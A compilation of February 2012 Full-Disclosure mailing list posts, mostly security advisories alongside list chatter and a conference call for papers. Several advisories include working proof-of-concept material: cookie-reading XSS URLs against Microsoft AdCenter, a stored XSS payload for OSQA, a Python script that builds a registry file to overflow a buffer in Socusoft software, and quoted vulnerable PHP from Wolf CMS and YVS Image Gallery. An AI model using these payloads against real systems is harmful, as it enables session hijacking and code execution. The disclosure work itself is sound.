Re: [Full-disclosure] Eleventh Circuit Finds Fifth Amendment Right Against Self Incrimination Protects Against Being Forced to Decrypt Hard Drive Contents
This isn't anything new On Sun, Feb 26, 2012 at 11:58 PM, Laurelai laure...@oneechan.org wrote: http://www.ca11.uscourts.gov/opinions/ops/201112268.pdf ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2414-2] fex regression
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2414-2 secur...@debian.org http://www.debian.org/security/Nico Golde February 25, 2012 http://www.debian.org/security/faq - - Package: fex Vulnerability : insufficient input sanitization Problem type : remote Debian-specific: no CVE ID : CVE-2012-0869 It was discovered that the last security update for F*X, DSA-2414-1, introduced a regression. Updated packages are now available to address this problem. For the stable distribution (squeeze), this problem has been fixed in version 20100208+debian1-1+squeeze3. The testing (wheezy) and unstable (sid) distributions are not affected by this problem. We recommend that you upgrade your fex packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk9JB/cACgkQHYflSXNkfP9GjgCdGiSMmCXDcyL5j68WnEkESLdT h/wAoKGSfE5MLDk4R0MrCbPynfH7xJYX =mm0h -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] pidgin OTR information leakage
Pidgin transmits OTR (off-the-record) conversations over DBUS in plaintext. This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account. Pidgin is a popular Instant Messenger application that runs on a wide variety of platforms including Windows and Linux. The pidgin-otr plugin enables users to communicate securely over any Instant Messenger network using the “Off-the-record” messaging protocol. If Pidgin is compiled with DBUS support and there is a DBUS session daemon running on the system, then all messages that are typed into Pidgin and messages received through Pidgin are broadcasted on DBUS. The reasoning behind this is to allow for third party applications, such as desktop widgets to process these messages (e.g. create an animation when a message arrives). However, among the messages transmitted over DBUS one also finds OTR conversations in plaintext form. This is a security problem, as the private OTR messages may leak to other (unrelated) processes that are executing with the Pidgin user’s rights. A more detailed advisory and proof-of-concept script can be found here: http://census-labs.com/news/2012/02/25/pidgin-otr-info-leak/ The Pidgin and pidgin-otr development teams have been contacted about this issue and we anticipate a fix in a coordinated future release. The Common Vulnerabilities and Exposures (CVE) project has assigned candidate name CVE-2012-1257 to this issue. Disclosure Timeline --- Vendor Contact(s): December 20th, 2011 CVE assignment:February 21st, 2012 Public Disclosure: February 25th, 2012 Kind regards, Dimitris Glynos -- http://census-labs.com -- IT security research, development and services ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DeepSec Sector v6 - Call for Papers
--- DeepSec 2012 Sector v6 - Call for Papers We are looking for talks and trainings for the DeepSec In-Depth Security Conference 2012 (Sector 6). We invite researchers, developers, auditors and everyone else dealing with information security to submit their work. We offer slots for talks and workshops, and we encourage everyone working on projects to present their results and findings. Please visit our updated website for more details about the venue, the schedule and information about our past conferences: https://deepsec.net/ The DeepSec offers a mix of different topics and aspects like current threats and vulnerabilities, social engineering and psychological aspects as well as security management and philosophy. Our speakers and trainers traditionally come from the security community, companies, hacker spaces, journalism and academic organisations. You can submit content for three categories: - Talks for the conference (45 minute slots) - Two day workshops - U21 (a special category for young security researchers) https://deepsec.net/cfp --- Talks: To make it short, talks should be up-to-date, of a high quality that matches our previous years and preferably exclusive (which of course is not a hard requirement but it will be one evaluation criterion). Topics from all security disciplines are welcome but we encourage you to submit talks about emerging technologies and concepts like these (in alphabetical order): - Cloud computing and virtualisation - Design flaws (defective by design or even secure by design) - IPv6 (again, until protocol designers get it right) - Mobile computing and communications - Risk assessment - Security intelligence - Security management and IT governance - Topics that have a high impact on IT security Talks must not: - Endorse products, vendors or specific solutions - Discredit anyone or anything, let's be fair Speaker privileges: - Free entrance to the conference - Hotel accommodation for three nights (single/double room) - Travel expenses up to EUR 800,- - Invitation to our famous Speaker's Dinner with genuine Austrian food --- Workshops: We look for highest quality and most current topics. We had very good feedback for our workshops in the past and we want to keep it that way. Our audience has a very high level of technical understanding and is deeply involved with security management, implementation, operation and research. What we like to see: - Applied cryptography - In-depth workshops on securing infrastructure or systems therein - Mobile communications, vulnerabilities and defences - Protocol and software development/design - Social engineering and psychological aspects Workshops should not: - Cover too much (two days sounds a lot, but isn't) - Focus on specific vendors or products - Teach too much basic stuff (keep the level sufficiently high) Trainer privileges: - Free entrance to the conference - Invitation to our famous Speaker's Dinner with Austrian food - 50% of the net profit of your class --- U21 category: We don't take the age so serious as it might sound but this category is especially for young security researchers who are *not* working in a professional sense yet, e.g. (full-time) students, or attending college, technical school or just interested in computer security. We will also accept submissions if you are a little bit older than 21 years. Don't be shy if your idea is not groundbreaking or not the top vulnerability discovered in the last 5 years. There's always room for some extra hacking and we'd be happy to provide a basis for breakthroughs. :) We want to encourage you to submit your _own_ research. We will ask some questions and evaluate your submission, so don't cheat. What we like to see: - anything that is your own idea and/or implementation - a valuable extension to existing ideas and/or implementations - anything you have discovered on your own and is not discussed a lot yet or has been accepted as a CVE (common exploit and vulnerability) Please don't: - Implement something which has been around for long - Reuse something existing U21 privileges: - A 15 minute lightning talk on the conference - Free entrance to the conference - Invitation to the Speaker's Dinner, but no alocohol without age check ;) - We help you with your travel expenses to Vienna, but cannot cover the full speakers allowance, if in doubt talk to us we can work something out. All CfP submissions must go through the form on our web site: https://deepsec.net/cfp.html Please make sure that you read http://blog.deepsec.net/?p=294 before submitting your ideas. Practice is never a bad thing. :) We will support anyone if you have question, need clarification whatever, just contact us for additional questions: c...@deepsec.net -- In-Depth Security Conference 2012 - DeepSec 2012 November 27th to 30th 2012 https://deepsec.net/ Venue: Renaissance Penta Vienna Hotel - Austria DeepSec GmbH - FN 294621 t - Handelsgericht Wien
Re: [Full-disclosure] pidgin OTR information leakage
On 02/25/2012 06:31 PM, Dimitris Glynos wrote: Pidgin transmits OTR (off-the-record) conversations over DBUS in plaintext. This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account. As noted by Peter Lawler this should really be referenced as a libpurple issue and not a pidgin one. You may find the updated advisory here: http://census-labs.com/news/2012/02/25/libpurple-otr-info-leak/ (old URL is valid too) Best regards, Dimitris Glynos -- http://census-labs.com -- IT security research, development and services ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Best DoS Tool
Hi List!! I made some research about DoS Tools for my regulars PenTesting. What is considered the best tool for DoS? I made some test with scapy with god results. wait for your comments, Best Regards Manuel Moreno ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Best DoS Tool
On Mon, Feb 27, 2012 at 4:35 AM, Manuel Moreno insecurech...@gmail.comwrote: Hi List!! I made some research about DoS Tools for my regulars PenTesting. What is considered the best tool for DoS? I made some test with scapy with god results. Wouldn't be the purpose of your research to answer that question? -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2012:023 ] libvpx
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:023 http://www.mandriva.com/security/ ___ Package : libvpx Date: February 27, 2012 Affected: 2010.1, 2011. ___ Problem Description: A vulnerability has been found and corrected in libvpx: VP8 Codec SDK (libvpx) before 1.0.0 Duclair allows remote attackers to cause a denial of service (application crash) via (1) unspecified corrupt input or (2) by starting decoding from a P-frame, which triggers an out-of-bounds read, related to the clamping of motion vectors in SPLITMV blocks (CVE-2012-0823). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0823 ___ Updated Packages: Mandriva Linux 2010.1: 80595bcf9605087872ef9e76988c06fb 2010.1/i586/libvpx0-0.9.7-0.2mdv2010.2.i586.rpm 6a39a655e52324d5454df93c54803e1d 2010.1/i586/libvpx-devel-0.9.7-0.2mdv2010.2.i586.rpm 36669f19119055daa1c65a4341bf00ee 2010.1/i586/libvpx-utils-0.9.7-0.2mdv2010.2.i586.rpm efbc2e9f8338a146ed9bb4a8133ee3d0 2010.1/SRPMS/libvpx-0.9.7-0.2mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 7d42ba1449797b928a025d82fbbf2a65 2010.1/x86_64/lib64vpx0-0.9.7-0.2mdv2010.2.x86_64.rpm 05101dfd30ef938952f61705a1394705 2010.1/x86_64/lib64vpx-devel-0.9.7-0.2mdv2010.2.x86_64.rpm 20e10865900d2a24d58b7677098057e8 2010.1/x86_64/libvpx-utils-0.9.7-0.2mdv2010.2.x86_64.rpm efbc2e9f8338a146ed9bb4a8133ee3d0 2010.1/SRPMS/libvpx-0.9.7-0.2mdv2010.2.src.rpm Mandriva Linux 2011: e77c03974267d8b697fce1944dc7627b 2011/i586/libvpx0-0.9.7-0.2-mdv2011.0.i586.rpm e52f1469cdf005a7a8e2855a65bfde2f 2011/i586/libvpx-devel-0.9.7-0.2-mdv2011.0.i586.rpm 6fbe1b807480c8c86d482cef51f5cc7d 2011/i586/libvpx-utils-0.9.7-0.2-mdv2011.0.i586.rpm e274966b396ce1cb66aa4b01f2bea88e 2011/SRPMS/libvpx-0.9.7-0.2.src.rpm Mandriva Linux 2011/X86_64: 81c2210c4f37421a22a877599304b5a4 2011/x86_64/lib64vpx0-0.9.7-0.2-mdv2011.0.x86_64.rpm 02f987fb0972c5b45a91a3d02060923f 2011/x86_64/lib64vpx-devel-0.9.7-0.2-mdv2011.0.x86_64.rpm a7d46c97d8294236422b37a8359ba64d 2011/x86_64/libvpx-utils-0.9.7-0.2-mdv2011.0.x86_64.rpm e274966b396ce1cb66aa4b01f2bea88e 2011/SRPMS/libvpx-0.9.7-0.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFPS0wZmqjQ0CJFipgRAj19AKDYdeUUJ4W5ODXZ8Jc6pacLTN7F5gCgj9rV VpJGmeRjSE0ld2CvsSuk3/A= =Tln3 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pandora FMS v4.0.1 - Local File Include Vulnerability
On Fri, Feb 17, 2012 at 01:32:19AM +0100, resea...@vulnerability-lab.com wrote: Title: Pandora FMS v4.0.1 - Local File Include Vulnerability Date: 2012-02-17 References: http://www.vulnerability-lab.com/get_content.php?id=435 VL-ID: 435 Report-Timeline: 2012-02-01: Vendor Notification 2012-02-17: Public or Non-Public Disclosure How did vendor respond? Is this fixed by vendor? - Henri Salo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2418-1] postgresql-8.4 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2418-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff February 27, 2012 http://www.debian.org/security/faq - - Package: postgresql-8.4 Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2012-0866 CVE-2012-0867 CVE-2012-0868 Several local vulnerabilities have been discovered in PostgreSQL, an object-relational SQL database. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2012-0866 It was discovered that the permissions of a function called by a trigger are not checked. This could result in privilege escalation. CVE-2012-0867 It was discovered that only the first 32 characters of a host name are checked when validating host names through SSL certificates. This could result in spoofing the connection in limited circumstances. CVE-2012-0868 It was discovered that pg_dump did not sanitise object names. This could result in arbitrary SQL command execution if a malformed dump file is opened. For the stable distribution (squeeze), this problem has been fixed in version 8.4.11-0squeeze1. For the unstable distribution (sid), this problem has been fixed in version 8.4.11-1. We recommend that you upgrade your postgresql-8.4 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk9LwJ4ACgkQXm3vHE4uyloAzgCfY91eNaRw1c0BbV5h+nDyPCid RMkAnj9R/A/5oW22U9vRx97RHkd8yDc2 =T+uw -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Eleventh Circuit Finds Fifth Amendment Right Against Self Incrimination Protects Against Being Forced to Decrypt Hard Drive Contents
On Mon, 27 Feb 2012 01:38:56 MST, Sanguinarious Rose said: This isn't anything new Yeah, the decision was released all the way back on Feb 23, four whole days ago, that's practically last century in Internet time... So tell me - what's your definition of new (obviously significantly less than 4 days), and how does it affect threads on F-D that last longer than 4 days? pgpbP4UsZ4HOU.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Microsoft AdCenter Service - Cross Site Vulnerabilities
Title: == Microsoft AdCenter Service - Cross Site Vulnerabilities Date: = 2012-02-27 References: === http://www.vulnerability-lab.com/get_content.php?id=447 MSRC ID: 12223 VL-ID: = 447 Introduction: = Microsoft adCenter (formerly MSN adCenter), is the division of the Microsoft Network (MSN) responsible for MSN s advertising services. Microsoft adCenter provides pay per click advertisements. This is a service aimed at people who want to advertise a product. Microsoft also has a (still in beta) service for webmasters who want to monetize on their site: Microsoft pubCenter. Search and display advertising solutions for small businesses and large advertisers and agencies on Bing and Yahoo! Search, MSN, Windows Live, Xbox Co. (Copy of the Vendor Website: http://advertising.microsoft.com/home) Abstract: = The Vulnerability-Lab Team discovered multiple non-persistent cross site scripting vulnerabilities on Microsofts AdCenter website application. Report-Timeline: 2012-02-18: Vendor Notification 2012-02-19: Vendor Response/Feedback 2012-02-26: Vendor Fix/Patch 2012-02-27: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Low Details: A non persistent cross site scripting vulnerability is detected on on Microsofts AdCenter website application. The vulnerability allows an remote attacker with required user inter action to hijack customer sessions via cross site scripting. Successful exploitation can result in account steal, client side phishing or session hijacking. Vulnerbale Module(s): [+] austra123; media brands; tv Picture(s): ../1.png ../2.png ../3.png Proof of Concept: = The vulnerabilites can be exploited by remote attackers with high required user inter action. For demonstration or reproduce ... advertising.microsoft.com/austra123%27;alert%28document.cookie%29;a=%27 advertising.microsoft.com/media-brands';alert(document.cookie);a=' advertising.microsoft.com/tv';alert(document.cookie);a=' Reference(s): advertising.microsoft.com/austra123 advertising.microsoft.com/media-brands advertising.microsoft.com/tv Risk: = The security risk of the non persistent cross site scripting vulnerabilities are estimated as low(+). Credits: Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Socusoft Photo 2 Video v8.05 - Buffer Overflow Vulnerability
Title: == Socusoft Photo 2 Video v8.05 - Buffer Overflow Vulnerability Date: = 2012-02-27 References: === http://www.vulnerability-lab.com/get_content.php?id=460 VL-ID: = 460 Introduction: = Socusoft photo to video converter Professional allows you to create all kinds of eye-catching slideshow videos (mp4, flv, mov, avi, mkv, mpeg, h.264, h.264 HD, 3gp, 3gpp2, swf ) playable on YouTube, Facebook, MySpace, iPod, iPad, iphone, Archos, PSP, Zune. With the powerful Photo to Video Converter Professional,you could convert photo to the animating and dynamic video and share the video on YouTube, Facebook, MySpace, iPod, iPad, iPhone. With just a few minutes of work, you\\\'ll have an eye-catching slideshow video with background music and dynamic panzoom and attractive transition effects. This powerful Photo to Video Converter Professional supports Over 260 animating transition effects with Pan Zoom effect. (Copy of the Vendor Homepage: ) Abstract: = A Vulnerability Laboratory Researcher discovered a Local Buffer Overflow vulnerability on Socusofts Photo to Video Converter Free and Professional v8.05 Report-Timeline: 2012-02-27: Public or Non-Public Disclosure Status: Published Affected Products: == Socusoft Photo 2 Video v8.05 Exploitation-Technique: === Local Severity: = High Details: A Buffer Overflow vulnerability is detected on Socusoft Photo to Video Converter Free and Professional v8.05 (current version). The vulnerability is located in the pdmlog.dll. Successful exploitation can result in execution of code, overwrite of registers system compromise. Vulnerable DLL(s): [+] pdmlog.dll --- Registers --- # EAX 42424242 # EBX 0036 pdmlog.dll:0036 # ECX 0036BF3B pdmlog.dll:pdmlog_5+A66B # EDX 80284006 # ESI 0002 # EDI # EBP 01C5FC0C Stack[01AC]:01C5FC0C # ESP 01C5FBF0 Stack[01AC]:01C5FBF0 # EIP 42424242 # EFL 00010206 --- Stack --- # 01C5FBE0 # 01C5FBE4 0002 # 01C5FBE8 94B7 # 01C5FBEC 0001 # 01C5FBF0 0036BF6F pdmlog.dll:pdmlog_5+A69F - Crash # 01C5FBF4 0036 pdmlog.dll:0036 # 01C5FBF8 0002 # 01C5FBFC # 01C5FC00 # 01C5FC04 01C5FC20 Stack[01AC]:01C5FC20 # 01C5FC08 7FFDE000 debug066:7FFDE000 --- Dump --- # 00370584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 # 00370594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 # 003705A4 42 42 42 42 43 43 43 43 43 43 43 43 43 43 43 43 # 003705B4 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 # 003705C4 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 Picture(s): ../1.png Proof of Concept: = The Vulnerability can be exploited by local attackers. For demonstration or reproduce ... #!/usr/bin/python # Exploit Title: Socusoft Photo to Video Converter Free/Pro v8.05 (pdmlog.dll) Local Buffer Overflow PoC # Version: 8.05 # Date: 2012-02-26 # Author:Julien Ahrens # Homepage: http://www.inshell.net # Software Link: http://www.socusoft.com # Tested on: Windows XP SP3 Professional German # Notes: Overflow occurs in pdmlog.dll # Howto: Import Reg - Start App # EAX 42424242 # EBX 0036 pdmlog.dll:0036 # ECX 0036BF3B pdmlog.dll:pdmlog_5+A66B # EDX 80284006 # ESI 0002 # EDI # EBP 01C5FC0C Stack[01AC]:01C5FC0C # ESP 01C5FBF0 Stack[01AC]:01C5FBF0 # EIP 42424242 # EFL 00010206 # 01C5FBE0 # 01C5FBE4 0002 # 01C5FBE8 94B7 # 01C5FBEC 0001 # 01C5FBF0 0036BF6F pdmlog.dll:pdmlog_5+A69F - Crash # 01C5FBF4 0036 pdmlog.dll:0036 # 01C5FBF8 0002 # 01C5FBFC # 01C5FC00 # 01C5FC04 01C5FC20 Stack[01AC]:01C5FC20 # 01C5FC08 7FFDE000 debug066:7FFDE000 file=poc.reg junk1=\x41 * 548 boom=\x42\x42\x42\x42 junk2=\x43 * 100 poc=Windows Registry Editor Version 5.00\n\n poc=poc + [HKEY_CURRENT_USER\Software\Socusoft Photo to Video Converter Free Version\General]\n poc=poc + \TempFolder\=\ + junk1 + boom + junk2 + \ try: print [*] Creating exploit file...\n; writeFile = open (file, w) writeFile.write( poc ) writeFile.close() print [*] File successfully created!; except: print [!] Error while creating file!; Risk: = The security risk of the local buffer overflow vulnerability is estimated as high(-). Credits: Vulnerability Research Laboratory - Julien Ahrens (MrTuxracer) [www.inshell.net] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability
[Full-disclosure] OSQA CMS v3b - Multiple Persistent Vulnerabilities
Title: == OSQA CMS v3b - Multiple Web Vulnerabilities Date: = 2012-02-27 References: === http://www.vulnerability-lab.com/get_content.php?id=461 VL-ID: = 461 Introduction: = OSQA is the Open Source QA System. It is free software licensed under the GPL, and you can download the source code for OSQA from our Subversion server. OSQA is originally based on CNProg, an excellent Chinese QA web application written by Mike Chen and Sailing Cai. OSQA is written in Python and powered by the Django application framework. Abstract: = The Vulnerability Lab Research Team discovered multiple persistent Input Validation Vulnerabilities on OSQAs CMS v3b. Report-Timeline: 2012-02-27: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent cross site scripting vulnerabilities are detected on OSQAs CMS v3b. The vulnerability allows remote attackers to hijack customer, moderator or admin sessions with high required user inter action or local low privileged user account medium required user inter action. Successful exploitation can result in account steal, phishing application-side content request manipulation. Vulnerable Module(s): [+] Url Bar [+] Picture Bar [+] Blockquote Proof of Concept: = The vulnerabilities can be exploited by local low privileged user accounts or remote attackers with high required user inter action. For demonstration or reproduce ... XSS #1 http://localhost/questions/ask/ press url bar put xss code img src=img src=search/onerror=alert(xss)// XSS #2 http://localhost/questions/ask/ press picture bar put xss code img src=img src=search/onerror=alert(xss)// Risk: = The security risk of the cross site scripting vulnerabilities are estimated as medium(-). Credits: Vulnerability Research Laboratory - Ucha Gobejishvili ( longrifle0x ) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Wolf CMS v0.7.5 - Multiple Web Vulnerabilities
Title: == Wolf CMS v0.7.5 - Multiple Web Vulnerabilities Date: = 2012-02-27 References: === http://www.vulnerability-lab.com/get_content.php?id=452 VL-ID: = 452 Introduction: = Wolf CMS is a content management system and is Free Software published under the GNU General Public License v3. Wolf CMS is written in the PHP programming language. Wolf CMS is a fork of Frog CMS. The project was a finalistin the 2010 Packt Publishing s Open Source awards for the Most Promising Open Source Project category. As of the 28th of December 2010, the Wolf CMS code repository was moved from Google Code to Github. ( Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Wolf_CMS ) Abstract: = Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities on the Wolf Content Management System v0.7.5 Report-Timeline: 2012-02-11: Vendor Notification 2012-02-27: Public or Non-Public Disclosure Status: Published Affected Products: == BlueWin CH Product: Wolf CMS v0.7.5 Exploitation-Technique: === Remote Severity: = High Details: 1.1 A SQL Injection vulnerability is detected on the Wolfs Content Management System v0.7.5. The vulnerability allows an remote attacker to execute own sql commands on the affected application dbms. Successful exploitation can result in dbms, web-server or application compromise. Vulnerable Module(s): [+] /plugins/comment/[Index] Picture(s): ../1.png 1.2 Multiple persistent vulnerabilities are detected on the Wolfs Content Management System v0.7.5. The bug allows an remote attacker or local low privileged user account to inject persistent malicious script code on application side. Successful exploitation can result in persistent context manipulation on requests, session hijacking account steal via application side phishing. Vulnerable Module(s): [+] /plugins/comment/ Picture(s): ../2.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers local low privileged user accounts with- and without required user inter action. For demonstration or reproduce ... 1.1 Path: /wolfcms/wolf/plugins/comment/ File: index.php Review: 271: $ip = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR']:($_SERVER['REMOTE_ADDR']); 1.2 Path: /wolfcms/wolf/plugins/comment/ File: index.php Review: /wolfcms/wolf/plugins/comment/index.php 272: echo 'input type=hidden value='.$ip.' name=comment[author_ip] /'; Risk: = 1.1 The security risk of the blind sql injection vulnerabilities are estimated as high(+). 1.2 The security risk of the persistant xss vulnerabilities are estimated as medium(+). Credits: Vulnerability Research Laboratory - Ucha Gobejishvili M. (longrifle0x) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] COPS substitute
Hi! I was guessing which program could be the current substitute of COPS ( http://en.wikipedia.org/wiki/COPS_(software) http://en.wikipedia.org/wiki/COPS_%28software%29 ), because this one is obsolete. Thanks! Adrian Este mensaje se dirige exclusivamente a su destinatario. Puede consultar nuestra política de envío y recepción de correo electrónico en el enlace situado más abajo. This message is intended exclusively for its addressee. We only send and receive email on the basis of the terms set out at http://www.tid.es/ES/PAGINAS/disclaimer.aspx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fwd: Case YVS Image Gallery
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I'm just forwarding this for you. Hope you enjoy :) - Original-Nachricht Betreff: [oss-security] Case YVS Image Gallery Datum: Mon, 27 Feb 2012 13:32:52 +0200 Von: Henri Salo he...@nerv.fi Antwort an: oss-secur...@lists.openwall.com An: oss-secur...@lists.openwall.com Kopie (CC): corry...@gmail.com, bugt...@securityfocus.com http://osvdb.org/show/osvdb/79477 The software YVS Image Gallery seems to be full of security issues. For example one can have lots of fun with this. Copy from installation.php: case(isset($_POST['db_name'])): $host = $_POST['host']; $db_name = $_POST['db_name']; $db_user_name = $_POST['db_user_name']; $db_password = $_POST['db_password']; $admin_name = $_POST['admin_name']; $admin_password = $_POST['admin_password']; $o_host = $_POST['o_host']; $o_db_name = $_POST['o_db_name']; $o_db_user_name = $_POST['o_db_user_name']; $o_db_password = $_POST['o_db_password']; //read in the file $file = ../functions/db_connect.php; $fh = fopen($file, 'r+'); $contents = fread($fh, filesize($file)); //set up the text to change $text_to_change = array(); $new_text = array(); $text_to_change[] = '$dbhost='.$o_host.''; $text_to_change[] = '$dbuser='.$o_db_user_name.''; $text_to_change[] = '$dbpass='.$o_db_password.''; $text_to_change[] = '$dbname='.$o_db_name.''; $new_text[] = '$dbhost='.$host.''; $new_text[] = '$dbuser='.$db_user_name.''; $new_text[] = '$dbpass='.$db_password.''; $new_text[] = '$dbname='.$db_name.''; $new_contents = str_replace($text_to_change, $new_text, $contents); fclose($fh); // Open file to write $fh = fopen($file, 'r+'); fwrite($fh, $new_contents); fclose($fh); //set up new admin user include '../functions/db_connect.php'; db_connect(); I'll bet this software is not used much, but I can list all problems I can find if we want to assign CVE-identifiers to cases like these. No contact information of developer found. Any ideas how to get these fixed or get the code out of internet. The package is also hosted in here: http://www.hotscripts.com/listing/yvs-image-gallery/ (and probably others). - - Henri Salo -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJPS21OAAoJEOtuXFFW9/UbSgMP/1nScj8Syt2ig84AEmY9D0fu RvI79FPyKpKANaLCHGNBrwy5MCufjdWaE74aqxwHop44HZ0rkhxeKhBfZlq5FqVp 